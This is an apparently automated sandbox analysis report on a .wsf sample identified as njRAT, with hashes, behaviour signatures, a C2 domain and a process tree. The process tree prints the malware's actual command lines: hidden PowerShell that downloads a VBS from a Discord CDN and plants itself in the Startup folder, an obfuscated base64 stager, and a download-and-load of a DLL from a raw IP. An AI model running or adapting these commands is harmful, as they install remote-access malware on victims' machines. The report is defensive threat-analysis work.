Analysis
- max time kernel: 104s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22/09/2022, 18:00

Static task: static1
Behavioral task: behavioral1
- Sample: e4fbe2c0de215885d004f354f1e57357.wsf
- Resource: win7-20220901-en
General
- Target: e4fbe2c0de215885d004f354f1e57357.wsf
- Size: 53KB
- MD5: e4fbe2c0de215885d004f354f1e57357
- SHA1: 258f167a93a3f51fee1e05f6d401661b5ea63bd3
- SHA256: ce6cdc61e1758c5abd949a017475171aea3dbd9571d45300990badd6006759c4
- SHA512: a3c1c60d641226aef13be04eda4c3e30e8a0b658e5bae65b4b3a7beba692dd57e63e5d451169d10e2f535414855be26767657ca6e08164e9f609e7f74f749023
- SSDEEP: 192:L48w8Nlb0bqGW6CCCuqpS848w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqiwSb0cJzwSb0cJR
Malware Config

Extracted
- http://5.42.199.120/dll/lannodll.txt

Extracted
- Family: njrat
- Version: 0.7NC
- Botnet: NYAN CAT
- C2: wins2109ok.duckdns.org:8000
- Mutex: cfe0aa9d35c
- Attributes:
  - reg_key: cfe0aa9d35c
  - splitter: @!#&^%$
Signatures

Blocklisted process makes network request (3 IoCs)
  flow | pid | Process
  5 | 1884 | powershell.exe
  12 | 1224 | powershell.exe
  13 | 1224 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (2 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | powershell.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\حتمذمیص.vbs | powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 1224 set thread context of 1344 | 1224 | powershell.exe | 91

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings | explorer.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  1884 | powershell.exe (2 entries)
  3760 | powershell.exe (2 entries)
  1224 | powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (24 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1884 | powershell.exe
  Token: SeDebugPrivilege | 3760 | powershell.exe
  Token: SeDebugPrivilege | 1224 | powershell.exe
  Token: SeDebugPrivilege | 1344 | CasPol.exe
  Token: 33 | 1344 | CasPol.exe (10 entries, alternating with the row below)
  Token: SeIncBasePriorityPrivilege | 1344 | CasPol.exe (10 entries)

Suspicious use of WriteProcessMemory (21 IoCs)
  description | pid | Process | procid_target
  PID 4600 wrote to memory of 1884 | 4600 | WScript.exe | 79 (2 entries)
  PID 1884 wrote to memory of 4640 | 1884 | powershell.exe | 81 (2 entries)
  PID 1132 wrote to memory of 2080 | 1132 | explorer.exe | 83 (2 entries)
  PID 2080 wrote to memory of 3760 | 2080 | WScript.exe | 84 (2 entries)
  PID 3760 wrote to memory of 1224 | 3760 | powershell.exe | 86 (2 entries)
  PID 1224 wrote to memory of 1344 | 1224 | powershell.exe | 91 (8 entries)
  PID 1344 wrote to memory of 2116 | 1344 | CasPol.exe | 96 (3 entries)
Processes

C:\Windows\System32\WScript.exe (PID 4600)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4fbe2c0de215885d004f354f1e57357.wsf"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1884)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1022146310729650249/1022278336447262750/Crpted55.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ØØªÙ…ذمیص.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ØØªÙ…ذمیص.wsf');Start-Sleep 1;rm *.vbs,*.wsf
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\explorer.exe (PID 4640)
      Command line: "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs

C:\Windows\explorer.exe (PID 1132)
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WScript.exe (PID 2080)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3760)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE4AWQBnAE8AeABSAF凸凸凸A凸凸凸AAlACcAOwBbAEIAeQB0AG凸凸凸AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG凸凸凸AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA凸凸凸wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG凸凸凸AdAAuAFcAZQBiAEMAbABpAG凸凸凸AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA凸凸凸wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMQAyADAALwBkAGwAbAAvAGwAYQBuAG4AbwBkAGwAbAAuAHQAeAB0ACcAKQApADsAWwBzAHkAcwB0AG凸凸凸AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH凸凸凸ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG凸凸凸AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAwADAAMAA4AGsAbwA5ADAAMQAyAC8AOAA0ADgAMwA0ADkAMwAzADcAMAA2ADgAOAAyADkAMQAyADAAMQAvADEANwA1ADMANQAwADcAMgA4AD凸凸凸ANgA2ADcAMgA5ADEAMgAwADEALwBzAHQAbgBlAG0AaABjAGEAdAB0AGEALwBtAG8AYwAuAHAAcABhAGQAcgBvAGMAcwBpAGQALgBuAGQAYwAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC0GKgZFBjAGRQbMBj凸凸凸GJwAgACkAKQA=';$OWjuxDt = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('凸凸凸','U') ) );$OWjuxDt = $OWjuxDt.replace('%NYgOxRUP%', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxDt
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1224)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.120/dll/lannodll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.0008ko9012/8483493370688291201/1753507285667291201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'حتمذمیص' ))"
        - Blocklisted process makes network request
        - Drops startup file
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe (PID 1344)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe (PID 2116)
            Command line: cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Network
MITRE ATT&CK Enterprise v6
Downloads

- Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

- Filesize: 64B
  MD5: a6c9d692ed2826ecb12c09356e69cc09
  SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
  SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
  SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

- Filesize: 1KB
  MD5: 4aaea8e990963328115bd59dee2bcda8
  SHA1: 2d7eed0a0a898811d6a149a4545ab3732477c01a
  SHA256: d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc
  SHA512: de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

- Filesize: 153KB
  MD5: a0fa641e1fe743aa44d0b42c25243143
  SHA1: 5db55be1cbe8e19f55671e18ca2741e9a5d61c48
  SHA256: 3e2e52d83f938c4bbe67d9369bb29866153ecc846aa7e9761e73dbfaa8a26041
  SHA512: e3f103df2bdc9590e738141159da75d63b9e61e60c85df689986157339641761c2269dd29fdbdea8838eaeec8c2569320682501a2df019f08222c8489110de4d